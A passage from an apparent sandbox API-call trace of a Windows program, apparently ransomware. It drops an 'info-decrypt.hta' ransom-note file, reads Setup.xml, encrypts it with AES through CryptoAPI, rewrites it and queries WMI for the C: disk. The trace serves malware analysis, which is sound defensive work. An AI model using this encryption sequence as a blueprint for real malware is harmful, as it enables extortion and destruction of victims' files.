lpOldMode=0x6c0f4b8) returned 1 [0208.579] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0208.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0208.579] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0208.579] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0eef8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0208.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f3ec) returned 1 [0208.580] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c [0208.685] GetFileType (hFile=0x27c) returned 0x1 [0208.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f3e8) returned 1 [0208.685] GetFileType (hFile=0x27c) returned 0x1 [0208.685] WriteFile (in: hFile=0x27c, lpBuffer=0x3654038*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6c0f4b0, lpOverlapped=0x0 | out: lpBuffer=0x3654038*, lpNumberOfBytesWritten=0x6c0f4b0*=0x1000, lpOverlapped=0x0) returned 1 [0208.686] WriteFile (in: hFile=0x27c, lpBuffer=0x3654038*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6c0f484, lpOverlapped=0x0 | out: lpBuffer=0x3654038*, lpNumberOfBytesWritten=0x6c0f484*=0x55e, lpOverlapped=0x0) returned 1 [0208.686] CloseHandle (hObject=0x27c) returned 1 [0208.686] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0208.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0208.687] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x3655054 | out: lpFileInformation=0x3655054*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978)) returned 1 [0208.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0208.687] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0208.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0208.687] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0208.687] GetFileType (hFile=0x27c) returned 0x1 [0208.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0208.687] GetFileType (hFile=0x27c) returned 0x1 [0208.687] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x978 [0208.688] ReadFile (in: hFile=0x27c, lpBuffer=0x3655be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x3655be8*, lpNumberOfBytesRead=0x6c0f4ec*=0x978, lpOverlapped=0x0) returned 1 [0208.690] CloseHandle (hObject=0x27c) returned 1 [0208.690] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdfbf0) returned 1 [0208.691] CryptGenRandom (in: hProv=0xbdfbf0, dwLen=0x10, pbBuffer=0x36572ac | out: pbBuffer=0x36572ac) returned 1 [0209.253] CryptImportKey (in: hProv=0xbdfbf0, pbData=0x36b3d70, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7fd10) returned 1 [0209.253] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.253] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.253] CryptDuplicateKey (in: hKey=0xb7fd10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f490) returned 1 [0209.253] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.253] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x36b3e50*=0x1, dwFlags=0x0) returned 1 [0209.253] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x36b3e1c, dwFlags=0x0) returned 1 [0209.253] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36b3e60*, pdwDataLen=0x6c0f4b8*=0x980, dwBufLen=0x980 | out: pbData=0x36b3e60*, pdwDataLen=0x6c0f4b8*=0x980) returned 1 [0209.254] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36b4804*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x36b4804*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0209.255] CryptDestroyKey (hKey=0xb7fd10) returned 1 [0209.255] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0209.255] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0209.255] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0209.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0209.255] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0209.256] GetFileType (hFile=0x264) returned 0x1 [0209.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0209.256] GetFileType (hFile=0x264) returned 0x1 [0209.256] WriteFile (in: hFile=0x264, lpBuffer=0x36b4e28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x36b4e28*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0209.257] CloseHandle (hObject=0x264) returned 1 [0209.291] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0209.292] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0209.292] CoTaskMemFree (pv=0xbed438) [0209.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0209.292] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0209.292] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0209.292] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0209.292] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.293] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027460) returned 0x0 [0209.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027460, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0209.293] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027460, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6031190) returned 0x0 [0209.293] WbemDefPath:IUnknown:Release (This=0x6027460) returned 0x0 [0209.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6031190) returned 0x0 [0209.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0209.293] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0209.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0209.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0209.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbdef60) returned 0x0 [0209.294] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdef60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.294] WbemDefPath:IUnknown:Release (This=0xbdef60) returned 0x3 [0209.294] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0209.294] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0209.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0209.294] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0209.294] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0209.294] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0209.294] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0209.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6031190) returned 0x0 [0209.294] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0209.294] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0209.294] WbemDefPath:IWbemPath:SetText (This=0x6031190, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031190, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031190, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031190, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0209.294] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.294] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0209.295] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0209.295] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0209.295] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.295] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60272c0) returned 0x0 [0209.295] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0209.295] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60314a0) returned 0x0 [0209.295] WbemDefPath:IUnknown:Release (This=0x60272c0) returned 0x0 [0209.295] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60314a0) returned 0x0 [0209.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0209.296] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0209.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0209.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0209.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbdf140) returned 0x0 [0209.296] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf140, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.296] WbemDefPath:IUnknown:Release (This=0xbdf140) returned 0x3 [0209.296] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0209.296] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0209.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0209.296] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0209.296] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0209.296] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0209.296] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0209.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60314a0) returned 0x0 [0209.296] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0209.296] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0209.296] WbemDefPath:IWbemPath:SetText (This=0x60314a0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0209.296] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0209.296] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0209.296] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.296] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0209.296] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0209.297] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0209.297] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.297] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6024ff0) returned 0x0 [0209.297] WbemLocator:IUnknown:QueryInterface (in: This=0x6024ff0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0209.297] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024ff0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027350) returned 0x0 [0209.297] WbemLocator:IUnknown:Release (This=0x6024ff0) returned 0x0 [0209.297] WbemLocator:IUnknown:QueryInterface (in: This=0x6027350, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027350) returned 0x0 [0209.298] WbemLocator:IUnknown:QueryInterface (in: This=0x6027350, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, 